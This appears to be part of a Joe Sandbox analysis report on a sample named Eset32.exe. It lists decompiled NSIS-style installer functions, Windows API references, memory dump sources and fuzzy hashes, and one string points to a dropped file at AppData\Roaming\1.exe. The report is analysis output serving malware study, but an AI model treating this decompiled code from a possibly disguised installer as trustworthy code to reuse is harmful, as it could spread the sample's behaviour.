                                                            • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                            • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                            • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                            • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32 ref: 004065A8
                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                          • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                          • Opcode Fuzzy Hash: baec25d5bd2dfe6d55721a489fba1732094f7a4d61ef90c6e2c4752007c8309d
                                                          • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00403830() {
                                                          				void* _t1;
                                                          				signed int _t6;
                                                          
                                                          				_t1 =  *0x40a018; // 0xffffffff
                                                          				if(_t1 != 0xffffffff) {
                                                          					CloseHandle(_t1);
                                                          					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                          					_t6 =  *0x40a018;
                                                          				}
                                                          				E00403875();
                                                          				return E004058BF(_t6, 0x436800, 7);
                                                          			}

                                                          APIs
                                                          • CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID:
                                                          • API String ID: 2962429428-0
                                                          • Opcode ID: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                          • Instruction ID: 504de9a345f4e041b5d785333e0db00fbf57b3530eebac313f647de5124f4253
                                                          • Opcode Fuzzy Hash: 83a8e34a36ec992e53eb10e28b6b1173665ca16798591da3225f5f7867e87012
                                                          • Instruction Fuzzy Hash: D3C01231540704B6D1247F759D4F9093A58AB45736B608775B0F5B00F1D73C8669456D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct tagRECT _v24;
                                                          				void* _v32;
                                                          				signed int _v36;
                                                          				int _v40;
                                                          				int _v44;
                                                          				signed int _v48;
                                                          				int _v52;
                                                          				void* _v56;
                                                          				void* _v64;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				struct HWND__* _t87;
                                                          				struct HWND__* _t89;
                                                          				long _t90;
                                                          				int _t95;
                                                          				int _t96;
                                                          				long _t99;
                                                          				void* _t102;
                                                          				intOrPtr _t124;
                                                          				struct HWND__* _t128;
                                                          				int _t150;
                                                          				int _t153;
                                                          				long _t157;
                                                          				struct HWND__* _t161;
                                                          				struct HMENU__* _t163;
                                                          				long _t165;
                                                          				void* _t166;
                                                          				char* _t167;
                                                          				char* _t168;
                                                          				int _t169;
                                                          
                                                          				_t87 =  *0x42ec04; // 0x0
                                                          				_t157 = _a8;
                                                          				_t150 = 0;
                                                          				_v8 = _t87;
                                                          				if(_t157 != 0x110) {
                                                          					__eflags = _t157 - 0x405;
                                                          					if(_t157 == 0x405) {
                                                          						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                          					}
                                                          					__eflags = _t157 - 0x111;
                                                          					if(_t157 != 0x111) {
                                                          						L17:
                                                          						__eflags = _t157 - 0x404;
                                                          						if(_t157 != 0x404) {
                                                          							L25:
                                                          							__eflags = _t157 - 0x7b;
                                                          							if(_t157 != 0x7b) {
                                                          								goto L20;
                                                          							}
                                                          							_t89 = _v8;
                                                          							__eflags = _a12 - _t89;
                                                          							if(_a12 != _t89) {
                                                          								goto L20;
                                                          							}
                                                          							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                          							__eflags = _t90 - _t150;
                                                          							_a12 = _t90;
                                                          							if(_t90 <= _t150) {
                                                          								L36:
                                                          								return 0;
                                                          							}
                                                          							_t163 = CreatePopupMenu();
                                                          							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                          							_t95 = _a16;
                                                          							__eflags = _a16 - 0xffffffff;
                                                          							_t153 = _a16 >> 0x10;
                                                          							if(_a16 == 0xffffffff) {
                                                          								GetWindowRect(_v8,  &_v24);
                                                          								_t95 = _v24.left;
                                                          								_t153 = _v24.top;
                                                          							}
                                                          							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                          							__eflags = _t96 - 1;
                                                          							if(_t96 == 1) {
                                                          								_t165 = 1;
                                                          								__eflags = 1;
                                                          								_v56 = _t150;
                                                          								_v44 = 0x42a890;
                                                          								_v40 = 0x1000;
                                                          								_a4 = _a12;
                                                          								do {
                                                          									_a4 = _a4 - 1;
                                                          									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                          									__eflags = _a4 - _t150;
                                                          									_t165 = _t165 + _t99 + 2;
                                                          								} while (_a4 != _t150);
                                                          								OpenClipboard(_t150);
                                                          								EmptyClipboard();
                                                          								_t102 = GlobalAlloc(0x42, _t165);
                                                          								_a4 = _t102;
                                                          								_t166 = GlobalLock(_t102);
                                                          								do {
                                                          									_v44 = _t166;
                                                          									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                          									 *_t167 = 0xd;
                                                          									_t168 = _t167 + 1;
                                                          									 *_t168 = 0xa;
                                                          									_t166 = _t168 + 1;
                                                          									_t150 = _t150 + 1;
                                                          									__eflags = _t150 - _a12;
                                                          								} while (_t150 < _a12);
                                                          								GlobalUnlock(_a4);
                                                          								SetClipboardData(1, _a4);
                                                          								CloseClipboard();
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						__eflags =  *0x42ebec - _t150; // 0x0
                                                          						if(__eflags == 0) {
                                                          							ShowWindow( *0x42f428, 8);
                                                          							__eflags =  *0x42f4cc - _t150;
                                                          							if( *0x42f4cc == _t150) {
                                                          								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
                                                          							}
                                                          							E00404154(1);
                                                          							goto L25;
                                                          						}
                                                          						 *0x429c60 = 2;
                                                          						E00404154(0x78);
                                                          						goto L20;
                                                          					} else {
                                                          						__eflags = _a12 - 0x403;
                                                          						if(_a12 != 0x403) {
                                                          							L20:
                                                          							return E004041E2(_t157, _a12, _a16);
                                                          						}
                                                          						ShowWindow( *0x42ebf0, _t150);
                                                          						ShowWindow(_v8, 8);
                                                          						E004041B0(_v8);
                                                          						goto L17;
                                                          					}
                                                          				}
                                                          				_v48 = _v48 | 0xffffffff;
                                                          				_v36 = _v36 | 0xffffffff;
                                                          				_t169 = 2;
                                                          				_v56 = _t169;
                                                          				_v52 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t124 =  *0x42f434;
                                                          				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                          				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                          				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                                                          				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                                                          				_t128 = GetDlgItem(_a4, 0x3f8);
                                                          				 *0x42ec04 = _t128;
                                                          				_v8 = _t128;
                                                          				E004041B0( *0x42ebf0);
                                                          				 *0x42ebf4 = E00404AA1(4);
                                                          				 *0x42ec0c = 0;
                                                          				GetClientRect(_v8,  &_v24);
                                                          				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                          				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                          				if(_a12 >= 0) {
                                                          					SendMessageA(_v8, 0x1001, 0, _a12);
                                                          					SendMessageA(_v8, 0x1026, 0, _a12);
                                                          				}
                                                          				if(_a8 >= _t150) {
                                                          					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                          				}
                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          				_push(0x1b);
                                                          				E0040417B(_a4);
                                                          				if(( *0x42f43c & 0x00000003) != 0) {
                                                          					ShowWindow( *0x42ebf0, _t150);
                                                          					if(( *0x42f43c & 0x00000002) != 0) {
                                                          						 *0x42ebf0 = _t150;
                                                          					} else {
                                                          						ShowWindow(_v8, 8);
                                                          					}
                                                          					E004041B0( *0x42ebe8);
                                                          				}
                                                          				_t161 = GetDlgItem(_a4, 0x3ec);
                                                          				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                          				if(( *0x42f43c & 0x00000004) != 0) {
                                                          					SendMessageA(_t161, 0x409, _t150, _a8);
                                                          					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                          				}
                                                          				goto L36;
                                                          			}
                                                          0x00405586
                                                          0x00000000
                                                          0x0040558d
                                                          0x00405554
                                                          0x0040555b
                                                          0x00405560
                                                          0x00000000
                                                          0x00405560
                                                          0x00405543
                                                          0x0040537e
                                                          0x00405382
                                                          0x0040538a
                                                          0x0040538e
                                                          0x00405391
                                                          0x00405394
                                                          0x00405397
                                                          0x0040539a
                                                          0x0040539b
                                                          0x0040539c
                                                          0x004053b5
                                                          0x004053b8
                                                          0x004053c2
                                                          0x004053d1
                                                          0x004053d9
                                                          0x004053e1
                                                          0x004053e6
                                                          0x004053e9
                                                          0x004053f5
                                                          0x004053fe
                                                          0x00405407
                                                          0x00405429
                                                          0x0040542f
                                                          0x00405440
                                                          0x00405445
                                                          0x00405453
                                                          0x00405461
                                                          0x00405461
                                                          0x00405466
                                                          0x00405474
                                                          0x00405474
                                                          0x00405479
                                                          0x0040547c
                                                          0x00405481
                                                          0x0040548d
                                                          0x00405496
                                                          0x004054a3
                                                          0x004054b2
                                                          0x004054a5
                                                          0x004054aa
                                                          0x004054aa
                                                          0x004054be
                                                          0x004054be
                                                          0x004054d2
                                                          0x004054db
                                                          0x004054e4
                                                          0x004054f4
                                                          0x00405500
                                                          0x00405500
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                          • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                          • Opcode Fuzzy Hash: 72bde667a9f022dbf1faa4afe05fd8607ffa87a39ae1d7f019a30909cdfce6d0
                                                          • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				long _v16;
                                                          				long _v20;
                                                          				long _v24;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				long _v36;
                                                          				char _v40;
                                                          				unsigned int _v44;
                                                          				signed int _v48;
                                                          				CHAR* _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				CHAR* _v72;
                                                          				void _v76;
                                                          				struct HWND__* _v80;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr _t82;
                                                          				long _t87;
                                                          				signed char* _t89;
                                                          				void* _t95;
                                                          				signed int _t96;
                                                          				int _t109;
                                                          				signed char _t114;
                                                          				signed int _t118;
                                                          				struct HWND__** _t122;
                                                          				intOrPtr* _t138;
                                                          				CHAR* _t146;
                                                          				intOrPtr _t147;
                                                          				unsigned int _t150;
                                                          				signed int _t152;
                                                          				unsigned int _t156;
                                                          				signed int _t158;
                                                          				signed int* _t159;
                                                          				signed char* _t160;
                                                          				struct HWND__* _t165;
                                                          				struct HWND__* _t166;
                                                          				int _t168;
                                                          				unsigned int _t197;
                                                          
                                                          				_t156 = __edx;
                                                          				_t82 =  *0x42a068;
                                                          				_v32 = _t82;
                                                          				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                          				if(_a8 == 0x40b) {
                                                          					E004057F7(0x3fb, _t146);
                                                          					E004063D2(_t146);
                                                          				}
                                                          				_t166 = _a4;
                                                          				if(_a8 != 0x110) {
                                                          					L8:
                                                          					if(_a8 != 0x111) {
                                                          						L20:
                                                          						if(_a8 == 0x40f) {
                                                          							L22:
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							E004057F7(0x3fb, _t146);
                                                          							if(E00405B7D(_t185, _t146) == 0) {
                                                          								_v8 = 1;
                                                          							}
                                                          							E004060F7(0x429860, _t146);
                                                          							_t87 = E00406500(1);
                                                          							_v16 = _t87;
                                                          							if(_t87 == 0) {
                                                          								L30:
                                                          								E004060F7(0x429860, _t146);
                                                          								_t89 = E00405B28(0x429860);
                                                          								_t158 = 0;
                                                          								if(_t89 != 0) {
                                                          									 *_t89 =  *_t89 & 0x00000000;
                                                          								}
                                                          								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                          									goto L35;
                                                          								} else {
                                                          									_t168 = 0x400;
                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                          									asm("cdq");
                                                          									_v48 = _t109;
                                                          									_v44 = _t156;
                                                          									_v12 = 1;
                                                          									goto L36;
                                                          								}
                                                          							} else {
                                                          								_t159 = 0;
                                                          								if(0 == 0x429860) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
                                                          									if(_t114 != 0) {
                                                          										break;
                                                          									}
                                                          									if(_t159 != 0) {
                                                          										 *_t159 =  *_t159 & _t114;
                                                          									}
                                                          									_t160 = E00405AD6(0x429860);
                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                          									_t159 = _t160 - 1;
                                                          									 *_t159 = 0x5c;
                                                          									if(_t159 != 0x429860) {
                                                          										continue;
                                                          									} else {
                                                          										goto L30;
                                                          									}
                                                          								}
                                                          								_t150 = _v44;
                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                          								_v44 = _t150 >> 0xa;
                                                          								_v12 = 1;
                                                          								_t158 = 0;
                                                          								__eflags = 0;
                                                          								L35:
                                                          								_t168 = 0x400;
                                                          								L36:
                                                          								_t95 = E00404AA1(5);
                                                          								if(_v12 != _t158) {
                                                          									_t197 = _v44;
                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                          										_v8 = 2;
                                                          									}
                                                          								}
                                                          								_t147 =  *0x42ebfc; // 0x4ab049
                                                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                          									E00404A89(0x3ff, 0xfffffffb, _t95);
                                                          									if(_v12 == _t158) {
                                                          										SetDlgItemTextA(_a4, _t168, 0x429850);
                                                          									} else {
                                                          										E004049C4(_t168, 0xfffffffc, _v48, _v44);
                                                          									}
                                                          								}
                                                          								_t96 = _v8;
                                                          								 *0x42f4e4 = _t96;
                                                          								if(_t96 == _t158) {
                                                          									_v8 = E0040140B(7);
                                                          								}
                                                          								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                          									_v8 = _t158;
                                                          								}
                                                          								E0040419D(0 | _v8 == _t158);
                                                          								if(_v8 == _t158 &&  *0x42a880 == _t158) {
                                                          									E00404566();
                                                          								}
                                                          								 *0x42a880 = _t158;
                                                          								goto L53;
                                                          							}
                                                          						}
                                                          						_t185 = _a8 - 0x405;
                                                          						if(_a8 != 0x405) {
                                                          							goto L53;
                                                          						}
                                                          						goto L22;
                                                          					}
                                                          					_t118 = _a12 & 0x0000ffff;
                                                          					if(_t118 != 0x3fb) {
                                                          						L12:
                                                          						if(_t118 == 0x3e9) {
                                                          							_t152 = 7;
                                                          							memset( &_v76, 0, _t152 << 2);
                                                          							_v80 = _t166;
                                                          							_v72 = 0x42a890;
                                                          							_v60 = E0040495E;
                                                          							_v56 = _t146;
                                                          							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
                                                          							_t122 =  &_v80;
                                                          							_v64 = 0x41;
                                                          							__imp__SHBrowseForFolderA(_t122);
                                                          							if(_t122 == 0) {
                                                          								_a8 = 0x40f;
                                                          							} else {
                                                          								__imp__CoTaskMemFree(_t122);
                                                          								E00405A8F(_t146);
                                                          								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
                                                          								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == 0x435400) {
                                                          									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
                                                          									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
                                                          										lstrcatA(_t146, 0x42e3c0);
                                                          									}
                                                          								}
                                                          								 *0x42a880 =  *0x42a880 + 1;
                                                          								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					if(_a12 >> 0x10 != 0x300) {
                                                          						goto L53;
                                                          					}
                                                          					_a8 = 0x40f;
                                                          					goto L12;
                                                          				} else {
                                                          					_t165 = GetDlgItem(_t166, 0x3fb);
                                                          					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
                                                          						E00405A8F(_t146);
                                                          					}
                                                          					 *0x42ebf8 = _t166;
                                                          					SetWindowTextA(_t165, _t146);
                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                          					_push(1);
                                                          					E0040417B(_t166);
                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          					_push(0x14);
                                                          					E0040417B(_t166);
                                                          					E004041B0(_t165);
                                                          					_t138 = E00406500(8);
                                                          					if(_t138 == 0) {
                                                          						L53:
                                                          						return E004041E2(_a8, _a12, _a16);
                                                          					} else {
                                                          						 *_t138(_t165, 1);
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}

                                                          0x00404915
                                                          0x0040491e
                                                          0x00404920
                                                          0x00404920
                                                          0x0040492c
                                                          0x00404934
                                                          0x0040493e
                                                          0x0040493e
                                                          0x00404943
                                                          0x00000000
                                                          0x00404943
                                                          0x004047f2
                                                          0x004047a9
                                                          0x004047b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004047b0
                                                          0x004046cf
                                                          0x004046d8
                                                          0x004046f2
                                                          0x004046f7
                                                          0x00404701
                                                          0x00404708
                                                          0x00404714
                                                          0x00404717
                                                          0x0040471a
                                                          0x00404721
                                                          0x00404729
                                                          0x0040472c
                                                          0x00404730
                                                          0x00404737
                                                          0x0040473f
                                                          0x00404799
                                                          0x00404741
                                                          0x00404742
                                                          0x00404749
                                                          0x00404753
                                                          0x0040475b
                                                          0x00404768
                                                          0x0040477c
                                                          0x00404780
                                                          0x00404780
                                                          0x0040477c
                                                          0x00404785
                                                          0x00404792
                                                          0x00404792
                                                          0x0040473f
                                                          0x00000000
                                                          0x004046f7
                                                          0x004046e5
                                                          0x00000000
                                                          0x00000000
                                                          0x004046eb
                                                          0x00000000
                                                          0x00404656
                                                          0x00404663
                                                          0x0040466c
                                                          0x00404679
                                                          0x00404679
                                                          0x00404680
                                                          0x00404686
                                                          0x0040468f
                                                          0x00404692
                                                          0x00404695
                                                          0x0040469d
                                                          0x004046a0
                                                          0x004046a3
                                                          0x004046a9
                                                          0x004046b0
                                                          0x004046b7
                                                          0x00404949
                                                          0x0040495b
                                                          0x004046bd
                                                          0x004046c0
                                                          0x00000000
                                                          0x004046c0
                                                          0x004046b7

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 0040465C
                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Roaming\1.exe,0042A890,00000000,?,?), ref: 00404774
                                                          • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Roaming\1.exe), ref: 00404780
                                                          • SetDlgItemTextA.USER32 ref: 00404792
                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\Eset32.exe" ,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Roaming\1.exe
                                                          • API String ID: 2624150263-541473819
                                                          • Opcode ID: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                          • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                          • Opcode Fuzzy Hash: 8ddaac7aadbff6108482b2740c9c7be650e0b7f0f0244fb474fb3660dfe90768
                                                          • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 98%
                                                          			E004058BF(void* __eflags, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				void* _v12;
                                                          				signed int _v16;
                                                          				struct _WIN32_FIND_DATAA _v336;
                                                          				signed int _t40;
                                                          				char* _t53;
                                                          				signed int _t55;
                                                          				signed int _t58;
                                                          				signed int _t64;
                                                          				signed int _t66;
                                                          				void* _t68;
                                                          				signed char _t69;
                                                          				CHAR* _t71;
                                                          				void* _t72;
                                                          				CHAR* _t73;
                                                          				char* _t76;
                                                          
                                                          				_t69 = _a8;
                                                          				_t73 = _a4;
                                                          				_v8 = _t69 & 0x00000004;
                                                          				_t40 = E00405B7D(__eflags, _t73);
                                                          				_v16 = _t40;
                                                          				if((_t69 & 0x00000008) != 0) {
                                                          					_t66 = DeleteFileA(_t73);
                                                          					asm("sbb eax, eax");
                                                          					_t68 =  ~_t66 + 1;
                                                          					 *0x42f4c8 =  *0x42f4c8 + _t68;
                                                          					return _t68;
                                                          				}
                                                          				_a4 = _t69;
                                                          				_t8 =  &_a4;
                                                          				 *_t8 = _a4 & 0x00000001;
                                                          				__eflags =  *_t8;
                                                          				if( *_t8 == 0) {
                                                          					L5:
                                                          					E004060F7(0x42b898, _t73);
                                                          					__eflags = _a4;
                                                          					if(_a4 == 0) {
                                                          						E00405AD6(_t73);
                                                          					} else {
                                                          						lstrcatA(0x42b898, "\*.*");
                                                          					}
                                                          					__eflags =  *_t73;
                                                          					if( *_t73 != 0) {
                                                          						L10:
                                                          						lstrcatA(_t73, 0x40a014);
                                                          						L11:
                                                          						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                          						_t40 = FindFirstFileA(0x42b898,  &_v336);
                                                          						__eflags = _t40 - 0xffffffff;
                                                          						_v12 = _t40;
                                                          						if(_t40 == 0xffffffff) {
                                                          							L29:
                                                          							__eflags = _a4;
                                                          							if(_a4 != 0) {
                                                          								_t32 = _t71 - 1;
                                                          								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                          								__eflags =  *_t32;
                                                          							}
                                                          							goto L31;
                                                          						} else {
                                                          							goto L12;
                                                          						}
                                                          						do {
                                                          							L12:
                                                          							_t76 =  &(_v336.cFileName);
                                                          							_t53 = E00405ABA( &(_v336.cFileName), 0x3f);
                                                          							__eflags =  *_t53;
                                                          							if( *_t53 != 0) {
                                                          								__eflags = _v336.cAlternateFileName;
                                                          								if(_v336.cAlternateFileName != 0) {
                                                          									_t76 =  &(_v336.cAlternateFileName);
                                                          								}
                                                          							}
                                                          							__eflags =  *_t76 - 0x2e;
                                                          							if( *_t76 != 0x2e) {
                                                          								L19:
                                                          								E004060F7(_t71, _t76);
